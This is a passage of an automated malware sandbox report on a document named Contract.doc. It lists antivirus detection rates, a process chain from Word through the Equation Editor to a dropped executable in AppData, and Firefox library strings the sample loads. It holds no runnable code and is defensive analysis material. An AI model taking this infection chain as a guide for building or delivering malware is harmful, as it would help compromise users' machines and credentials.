            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: hjdegydbhk.exe, 00000005.00000003.2126746395.000000001F008000.00000004.00000001.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: Contract.docVirustotal: Detection: 44%
            Source: Contract.docReversingLabs: Detection: 44%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeProcess created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2124621386.000000001F9C0000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128987010.000000001F618000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: hjdegydbhk.exe, 00000005.00000003.2125456256.000000001F9BC000.00000004.00000001.sdmp, mozglue.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
            Source: Binary string: ucrtbase.pdb source: hjdegydbhk.exe, 00000005.00000003.2127283752.000000001F028000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: hjdegydbhk.exe, 00000005.00000003.2125266844.000000001EFF4000.00000004.00000001.sdmp, freebl3.dll.5.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128318091.000000001F5AC000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128607566.000000001F5D8000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128987010.000000001F618000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128318091.000000001F5AC000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2123986478.000000001F9C0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128607566.000000001F5D8000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: hjdegydbhk.exe, 00000005.00000003.2131170016.000000001F9A4000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: hjdegydbhk.exe, 00000005.00000003.2125456256.000000001F9BC000.00000004.00000001.sdmp, mozglue.dll.5.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb